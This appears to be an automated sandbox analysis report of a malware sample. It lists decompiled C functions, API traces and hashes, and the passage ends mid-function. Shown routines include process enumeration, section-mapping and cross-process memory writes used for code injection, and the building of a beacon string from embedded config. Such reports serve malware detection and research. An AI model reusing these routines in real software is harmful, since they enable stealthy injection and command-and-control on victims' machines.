                                • Part of subcall function 01029704: GetProcAddress.KERNEL32(00000000,?), ref: 01029761
                                • Part of subcall function 01029704: GetProcAddress.KERNEL32(00000000,?), ref: 01029777
                                • Part of subcall function 01029704: GetProcAddress.KERNEL32(00000000,?), ref: 0102978D
                                • Part of subcall function 01029704: GetProcAddress.KERNEL32(00000000,?), ref: 010297A3
                                • Part of subcall function 01023EB7: NtMapViewOfSection.NTDLL(00000000,000000FF,010396AE,00000000,00000000,010396AE,?,00000002,00000000,?,?,00000000,010396AE,000000FF,?), ref: 01023EE5
                                • Part of subcall function 01045F28: memcpy.NTDLL(575653E8,575653F0,?,?,01033C99,?,?,?,?,?,01033C99,?,00000000), ref: 01045F8E
                                • Part of subcall function 01045F28: memcpy.NTDLL(?,?,?), ref: 01045FED
                              • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,01033C99,?,00000000), ref: 0102D6BF
                              • memcpy.NTDLL(01033CB1,?,00000018,?,?,?,?,?,?,?,01033C99,?,00000000), ref: 0102D70B
                              • NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 0102D7CD
                              • memset.NTDLL ref: 0102D7F5
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AddressProcmemcpy$SectionView$HandleModuleUnmapmemset
                              • String ID:
                              • API String ID: 1575695328-0
                              • Opcode ID: 8cc092547d990697ecb6f8c7e3c4ed0f243cedf117f6ca10d46134d9f9cdf1f3
                              • Instruction ID: 5edd1e16747f493128689f020466b1ee5ba7c6047682ec4b4ad65848f33b403d
                              • Opcode Fuzzy Hash: 8cc092547d990697ecb6f8c7e3c4ed0f243cedf117f6ca10d46134d9f9cdf1f3
                              • Instruction Fuzzy Hash: B0916EB190021AEFDB51DF98C984BEEBBF4FF08304F1441A9E985A7251E775AA44CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E3309, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                              Download Yara Rule
                              C-Code - Quality: 68%
                              			E013E3309() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x13ed2b8; // 0x26ea5a8
						_t2 = _t9 + 0x13eee88; // 0x73617661
						_push( &_v264);
						if( *0x13ed110() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}










                              0x013e3314
                              0x013e3319
                              0x013e331e
                              0x013e3322
                              0x013e332c
                              0x013e335d
                              0x013e3333
                              0x013e3338
                              0x013e3345
                              0x013e334e
                              0x013e3365
                              0x013e3350
                              0x013e3358
                              0x00000000
                              0x013e3358
                              0x013e3366
                              0x013e3367
                              0x00000000
                              0x013e3367
                              0x00000000
                              0x013e3361
                              0x013e336d
                              0x013e3372

                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 013E3319
                              • Process32First.KERNEL32(00000000,?), ref: 013E332C
                              • Process32Next.KERNEL32(00000000,?), ref: 013E3358
                              • CloseHandle.KERNEL32(00000000), ref: 013E3367
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: eea49d895e02a8985fb17414bf6375d0f93b065b66668ec5508ab277e0eb1583
                              • Instruction ID: c39df7d37e1b9d92e8786106b8e28413ff280f61b2ce97404100a30e71d2655b
                              • Opcode Fuzzy Hash: eea49d895e02a8985fb17414bf6375d0f93b065b66668ec5508ab277e0eb1583
                              • Instruction Fuzzy Hash: A9F0F6325003386AD770E6699C0CEEB77ECFBC5728F000061F959C31C4EE20CA4987A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103963A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtCreateSection.NTDLL(01033C99,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000), ref: 01039697
                                • Part of subcall function 01023EB7: NtMapViewOfSection.NTDLL(00000000,000000FF,010396AE,00000000,00000000,010396AE,?,00000002,00000000,?,?,00000000,010396AE,000000FF,?), ref: 01023EE5
                              • memset.NTDLL ref: 010396BB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Section$CreateViewmemset
                              • String ID: @
                              • API String ID: 2533685722-2766056989
                              • Opcode ID: 58eb199baf22e92f241a5e4e7275f1aa377c549cc96e7f139b6cc6e9e22613ff
                              • Instruction ID: 43a7ab9a2de6d4e7252e298dc1c475d852b38549ca11a1d5177a594207d4b143
                              • Opcode Fuzzy Hash: 58eb199baf22e92f241a5e4e7275f1aa377c549cc96e7f139b6cc6e9e22613ff
                              • Instruction Fuzzy Hash: 6F213BB2D0020DAFCB01DFA9C8809EEFBB9FF48354F104529E655F7250D770AA488B64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010467CD, Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcAddress.KERNEL32(?,00000318), ref: 010467F2
                              • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 0104680E
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                                • Part of subcall function 01031635: GetProcAddress.KERNEL32(?,00000000), ref: 0103165E
                                • Part of subcall function 01031635: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,0104684F,00000000,00000000,00000028,00000100), ref: 01031680
                              • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 01046978
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                              • String ID:
                              • API String ID: 3547194813-0
                              • Opcode ID: 7c96c1b2d4de6c6816168524b246105c735c041af45d15d59aaeb925ca9b9f0f
                              • Instruction ID: f228909c4d8b2b4d3e4de487c634a88e32db102b4068e659b028bce83b71c4be
                              • Opcode Fuzzy Hash: 7c96c1b2d4de6c6816168524b246105c735c041af45d15d59aaeb925ca9b9f0f
                              • Instruction Fuzzy Hash: 75614FB4A00206ABDB55CF98C980BEEBBF8FF49300F044569E995E7245E771E954CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103C51B, Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 0103C52F
                              • GetProcAddress.KERNEL32(?), ref: 0103C557
                              • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 0103C575
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AddressInformationProcProcess64QueryWow64memset
                              • String ID:
                              • API String ID: 2968673968-0
                              • Opcode ID: 3efe6317da471a646de21b50010a8a50668f18413ac2311ff1b4f60f1c57f422
                              • Instruction ID: d6b8440ca98ecb5dacf98b0ada86416dfe868c5f1bf81abf053cecae1bd2f4fd
                              • Opcode Fuzzy Hash: 3efe6317da471a646de21b50010a8a50668f18413ac2311ff1b4f60f1c57f422
                              • Instruction Fuzzy Hash: 7D11C675A0021DAFEB51CB98DD45F9E7BBCEB88740F040125F944E7294E770EA45CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010309CA, Relevance: 4.5, APIs: 3, Instructions: 29memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(0102C119,00000000,00000000,0102C119,00003000,00000040), ref: 010309FB
                              • RtlNtStatusToDosError.NTDLL(00000000), ref: 01030A02
                              • SetLastError.KERNEL32(00000000), ref: 01030A09
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Error$AllocateLastMemoryStatusVirtual
                              • String ID:
                              • API String ID: 722216270-0
                              • Opcode ID: e171a2042ae48906269b8bc8c4907c72d7a703daa37b251a2834c18927fab38d
                              • Instruction ID: 8152efa07a970439d7c6ee76bc3761a890ffc8a00bf110d51e27e5d48a86a0a6
                              • Opcode Fuzzy Hash: e171a2042ae48906269b8bc8c4907c72d7a703daa37b251a2834c18927fab38d
                              • Instruction Fuzzy Hash: ABF05EB5611309FBEB15CF94DA59F9EBABCAB04305F100048B601A6080EBB9AB00DB68
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01044FEA, Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000004,?,?,?,74786780,?,0103FDBE,?,00000004,?,00000004,?), ref: 01045008
                              • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01045017
                              • SetLastError.KERNEL32(00000000,?,0103FDBE,?,00000004,?,00000004,?,?,?,?,01033C11,?,?,CCCCFEEB,?), ref: 0104501E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Error$LastMemoryStatusVirtualWrite
                              • String ID:
                              • API String ID: 1089604434-0
                              • Opcode ID: 135cea67b62e5376cc420d2216e4a2df1012d9a70bb2e9bafb5cfae978b99cdf
                              • Instruction ID: 2e5250814b55ac55f5af61e72bb855e9b634318a87d66bfee503d2c56ccfee90
                              • Opcode Fuzzy Hash: 135cea67b62e5376cc420d2216e4a2df1012d9a70bb2e9bafb5cfae978b99cdf
                              • Instruction Fuzzy Hash: C0E0487A20011AEBDF115ED89D48D8A7F69EB0C781B004020BF41C3121C737C820EBE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E4638, Relevance: 3.1, APIs: 2, Instructions: 123COMMON
                              Download Yara Rule
                              C-Code - Quality: 21%
                              			E013E4638(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				void* _v8;
				char _v12;
				signed int _t34;
				long _t36;
				long _t37;
				signed int _t38;
				void* _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t45;
				void* _t56;
				intOrPtr _t57;
				void* _t63;
				intOrPtr* _t65;
				intOrPtr* _t66;
				void* _t69;

				_t66 = __esi;
				_t63 = E013E65F6(_t34, _a4);
				if(_t63 == 0) {
					L18:
					_t36 = GetLastError();
				} else {
					_t37 = GetVersion();
					_t69 = _t37 - 6;
					if(_t69 > 0 || _t69 == 0 && _t37 > 2) {
						_a4 = 4;
					} else {
						_a4 = 0;
					}
					__imp__(_t63, _a4, 0, 0, 0); // executed
					 *(_t66 + 0x10) = _t37;
					_t38 = E013E6DFA(_t63);
					if( *(_t66 + 0x10) == 0) {
						goto L18;
					} else {
						_t39 = E013E65F6(_t38,  *_t66);
						_v8 = _t39;
						if(_t39 == 0) {
							goto L18;
						} else {
							_t65 = __imp__; // 0x703bf5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
								_t40 = E013E6DFA(_v8);
								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x800100;
									_t56 = E013E65F6(_t40,  *((intOrPtr*)(_t66 + 4)));
									if(_t56 == 0) {
										goto L18;
									} else {
										_t42 =  *0x13ed2b8; // 0x26ea5a8
										_t19 = _t42 + 0x13ee758; // 0x450047
										_t43 = _t19;
										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
										E013E6DFA(_t56);
										_t45 =  *((intOrPtr*)(_t66 + 0x18));
										if(_t45 == 0) {
											goto L18;
										} else {
											_t57 = 4;
											_v12 = _t57;
											__imp__(_t45, 0x1f,  &_a4,  &_v12);
											if(_t45 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
											}
											_push(_t57);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t66 + 0x18)));
											if( *_t65() == 0) {
												goto L18;
											} else {
												_push(_t57);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t66 + 0x18)));
												if( *_t65() == 0) {
													goto L18;
												} else {
													_t36 = 0;
												}
											}
										}
									}
								}
							} else {
								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
								if(_t39 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t36;
			}




















                              0x013e4638
                              0x013e4647
                              0x013e464d
                              0x013e477c
                              0x013e477c
                              0x013e4653
                              0x013e4653
                              0x013e4659
                              0x013e465b
                              0x013e4669
                              0x013e4664
                              0x013e4664
                              0x013e4664
                              0x013e4677
                              0x013e467e
                              0x013e4681
                              0x013e4689
                              0x00000000
                              0x013e468f
                              0x013e4691
                              0x013e4698
                              0x013e469b
                              0x00000000
                              0x013e46a1
                              0x013e46a4
                              0x013e46aa
                              0x013e46c1
                              0x013e46cd
                              0x013e46d6
                              0x013e46d9
                              0x013e46e1
                              0x00000000
                              0x013e46e7
                              0x013e46ea
                              0x013e46f6
                              0x013e46fc
                              0x00000000
                              0x013e46fe
                              0x013e4701
                              0x013e470a
                              0x013e470a
                              0x013e4714
                              0x013e471b
                              0x013e471e
                              0x013e4723
                              0x013e4728
                              0x00000000
                              0x013e472a
                              0x013e472c
                              0x013e4738
                              0x013e473b
                              0x013e4743
                              0x013e4745
                              0x013e4756
                              0x013e4756
                              0x013e4758
                              0x013e475c
                              0x013e475d
                              0x013e475f
                              0x013e4766
                              0x00000000
                              0x013e4768
                              0x013e4768
                              0x013e476c
                              0x013e476d
                              0x013e476f
                              0x013e4776
                              0x00000000
                              0x013e4778
                              0x013e4778
                              0x013e4778
                              0x013e4776
                              0x013e4766
                              0x013e4728
                              0x013e46fc
                              0x013e46ac
                              0x013e46b7
                              0x013e46bb
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013e46bb
                              0x013e46aa
                              0x013e469b
                              0x013e4689
                              0x013e4785

                              APIs
                                • Part of subcall function 013E65F6: lstrlen.KERNEL32(?,00000000,03AD9B78,00000000,013E25B8,03AD9D56,69B25F44,?,?,?,?,69B25F44,00000005,013ED00C,4D283A53,?), ref: 013E65FD
                                • Part of subcall function 013E65F6: mbstowcs.NTDLL ref: 013E6626
                                • Part of subcall function 013E65F6: memset.NTDLL ref: 013E6638
                              • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,013E572B,747C81D0,00000000,03AD9618,?,?,013E3B91,?,03AD9618,0000EA60), ref: 013E4653
                              • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,013E572B,747C81D0,00000000,03AD9618,?,?,013E3B91,?,03AD9618,0000EA60), ref: 013E477C
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                              • String ID:
                              • API String ID: 4097109750-0
                              • Opcode ID: 789f6b3e960b6fef887d5c8b22b5da59bbb05f8c05374fbda7c2387806fb7b9a
                              • Instruction ID: 5131c894b2cca5897dfd65b5b91ac907bca150e18f344000e168819cee46a70f
                              • Opcode Fuzzy Hash: 789f6b3e960b6fef887d5c8b22b5da59bbb05f8c05374fbda7c2387806fb7b9a
                              • Instruction Fuzzy Hash: 004138B1100319BFEB319FA8CD89EAA7BECAB18749F044529F612D60D1E771DA448B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E7562, Relevance: 3.1, APIs: 2, Instructions: 70nativeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 72%
                              			E013E7562(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E013E65B4(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                              0x013e756b
                              0x013e7572
                              0x013e7573
                              0x013e7574
                              0x013e7575
                              0x013e7576
                              0x013e7587
                              0x013e758b
                              0x013e759f
                              0x013e75a2
                              0x013e75a5
                              0x013e75ac
                              0x013e75af
                              0x013e75b6
                              0x013e75b9
                              0x013e75bc
                              0x013e75bf
                              0x013e75c4
                              0x013e75ff
                              0x013e75c6
                              0x013e75c9
                              0x013e75cf
                              0x013e75d4
                              0x013e75d8
                              0x013e75f6
                              0x013e75da
                              0x013e75e1
                              0x013e75ef
                              0x013e75ef
                              0x013e75d8
                              0x013e7607

                              APIs
                              • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,013E6DA4), ref: 013E75BF
                                • Part of subcall function 013E65B4: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,013E75D4,00000002,00000000,?,?,00000000,?,?,013E75D4,00000000), ref: 013E65E1
                              • memset.NTDLL ref: 013E75E1
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Section$CreateViewmemset
                              • String ID:
                              • API String ID: 2533685722-0
                              • Opcode ID: 7b17b77b2f6c88aa2ae40b1cc99be76bae56fb1d76c391742396b67112d96bb9
                              • Instruction ID: 7d7ed8203f3edeb7153e0ec89bd1668a5789e6c247dff5a892474f74af2258ae
                              • Opcode Fuzzy Hash: 7b17b77b2f6c88aa2ae40b1cc99be76bae56fb1d76c391742396b67112d96bb9
                              • Instruction Fuzzy Hash: 9D2108B6D00219AFDB11DFA9C8849EEFBF9EB48254F104429E616F3250D731AA458FA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01031635, Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcAddress.KERNEL32(?,00000000), ref: 0103165E
                              • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,0104684F,00000000,00000000,00000028,00000100), ref: 01031680
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AddressMemory64ProcReadVirtualWow64
                              • String ID:
                              • API String ID: 752694512-0
                              • Opcode ID: 365e4b1798e6507efab47023e4555fc98cf6e0f0e1f9bcf47e67f0049cc62e8c
                              • Instruction ID: 58f5083cc19bec68a8e0cf9e9aadae8f4e73c5aad21f3ebd6587d2f4c1424a60
                              • Opcode Fuzzy Hash: 365e4b1798e6507efab47023e4555fc98cf6e0f0e1f9bcf47e67f0049cc62e8c
                              • Instruction Fuzzy Hash: 7FF0F976600209FFCB128F89DC44C9EBBBEEBD8390B14445AF994D3124D776D951DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01023EB7, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtMapViewOfSection.NTDLL(00000000,000000FF,010396AE,00000000,00000000,010396AE,?,00000002,00000000,?,?,00000000,010396AE,000000FF,?), ref: 01023EE5
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: SectionView
                              • String ID:
                              • API String ID: 1323581903-0
                              • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                              • Instruction ID: d2e46322fd53de99c2fc24df72acdca37f074af6fdc8e8865767a403406d68dd
                              • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                              • Instruction Fuzzy Hash: 58F0FEB690020CBFDB119FA5CC85C9FBBBDEB48344B00882AF55295450D6719E189B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E65B4, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 68%
                              			E013E65B4(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                              0x013e65c6
                              0x013e65cc
                              0x013e65da
                              0x013e65e1
                              0x013e65e6
                              0x013e65ec
                              0x00000000
                              0x013e65ed
                              0x00000000

                              APIs
                              • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,013E75D4,00000002,00000000,?,?,00000000,?,?,013E75D4,00000000), ref: 013E65E1
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: SectionView
                              • String ID:
                              • API String ID: 1323581903-0
                              • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                              • Instruction ID: 4300bde02d00e1325310075bfe61e35b1dc988ae41a3ba73709c8fb84b116423
                              • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                              • Instruction Fuzzy Hash: 0DF012B5A0030DFFDB119FA5CC89C9FBBFDEB44254F104939B152E1094D631AE088A60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01044582, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryInformationProcess.NTDLL(00000000,0102B24B,00000018,00000000,01050460), ref: 01044599
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID:
                              • API String ID: 1778838933-0
                              • Opcode ID: 3b59ff89809fa4520bb891e1d5d4ac226cb5c53ce44533b7bc7067372396a6d2
                              • Instruction ID: 145a79e34c3a7d2266a7bc4745b543f34167afc6a296d6c493eb87c054d1d8e3
                              • Opcode Fuzzy Hash: 3b59ff89809fa4520bb891e1d5d4ac226cb5c53ce44533b7bc7067372396a6d2
                              • Instruction Fuzzy Hash: A5F03AB13002269BDB20CA59C8C5E9BBBA8EB067547104664EA41DBA56D620E905CBE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E6367, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 180memorystringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 64%
                              			E013E6367(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a16, void* _a24, intOrPtr _a32, void* _a40) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v12;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v52;
				void* __edi;
				long _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t49;
				intOrPtr _t53;
				intOrPtr _t57;
				intOrPtr* _t59;
				void* _t60;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t78;
				int _t81;
				void* _t83;
				void* _t84;
				void* _t88;
				intOrPtr _t90;
				long _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				int _t95;
				void* _t96;
				void* _t97;
				void* _t100;
				void* _t102;

				_t88 = __edx;
				_t84 = __ecx;
				_t30 = __eax;
				_t100 =  &_v12;
				_t83 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t30 = GetTickCount();
				}
				_t31 =  *0x13ed018; // 0x9945a377
				asm("bswap eax");
				_t32 =  *0x13ed014; // 0x3a87c8cd
				asm("bswap eax");
				_t33 =  *0x13ed010; // 0xd8d2f808
				asm("bswap eax");
				_t34 =  *0x13ed00c; // 0x13d015ef
				asm("bswap eax");
				_t35 =  *0x13ed2b8; // 0x26ea5a8
				_t3 = _t35 + 0x13ee633; // 0x74666f73
				_t95 = wsprintfA(_t83, _t3, 2, 0x3f87e, _t34, _t33, _t32, _t31,  *0x13ed02c,  *0x13ed004, _t30);
				_t38 = E013E8DA6();
				_t39 =  *0x13ed2b8; // 0x26ea5a8
				_t4 = _t39 + 0x13ee673; // 0x74707526
				_t42 = wsprintfA(_t95 + _t83, _t4, _t38);
				_t102 = _t100 + 0x38;
				_t96 = _t95 + _t42; // executed
				_t43 = E013E40AC(_t84); // executed
				_a32 = _t43;
				if(_t43 != 0) {
					_t78 =  *0x13ed2b8; // 0x26ea5a8
					_t7 = _t78 + 0x13ee8b2; // 0x736e6426
					_t81 = wsprintfA(_t96 + _t83, _t7, _t43);
					_t102 = _t102 + 0xc;
					_t96 = _t96 + _t81;
					HeapFree( *0x13ed270, 0, _a40);
				}
				_t44 = E013E8941();
				_a32 = _t44;
				if(_t44 != 0) {
					_t74 =  *0x13ed2b8; // 0x26ea5a8
					_t11 = _t74 + 0x13ee885; // 0x6f687726
					wsprintfA(_t96 + _t83, _t11, _t44);
					HeapFree( *0x13ed270, 0, _a40);
				}
				_t90 =  *0x13ed35c; // 0x3ad95b0
				_t46 = E013E3FB8(0x13ed00a, _t90 + 4);
				_t92 = 0;
				_a8 = _t46;
				if(_t46 != 0) {
					_t49 = RtlAllocateHeap( *0x13ed270, 0, 0x800); // executed
					_a24 = _t49;
					if(_t49 != 0) {
						E013E47EF(GetTickCount());
						_t53 =  *0x13ed35c; // 0x3ad95b0
						__imp__(_t53 + 0x40);
						asm("lock xadd [eax], ecx");
						_t57 =  *0x13ed35c; // 0x3ad95b0
						__imp__(_t57 + 0x40);
						_t59 =  *0x13ed35c; // 0x3ad95b0
						_t60 = E013EA7FB(1, _t88, _t83,  *_t59); // executed
						_t97 = _t60;
						asm("lock xadd [eax], ecx");
						if(_t97 != 0) {
							StrTrimA(_t97, 0x13ec2ac);
							_push(_t97);
							_t65 = E013E6F6D();
							_v20 = _t65;
							if(_t65 != 0) {
								_t93 = __imp__;
								 *_t93(_t97, _v0);
								 *_t93(_a4, _v20);
								_t94 = __imp__;
								 *_t94(_v4, _v32);
								 *_t94(_v12, _t97);
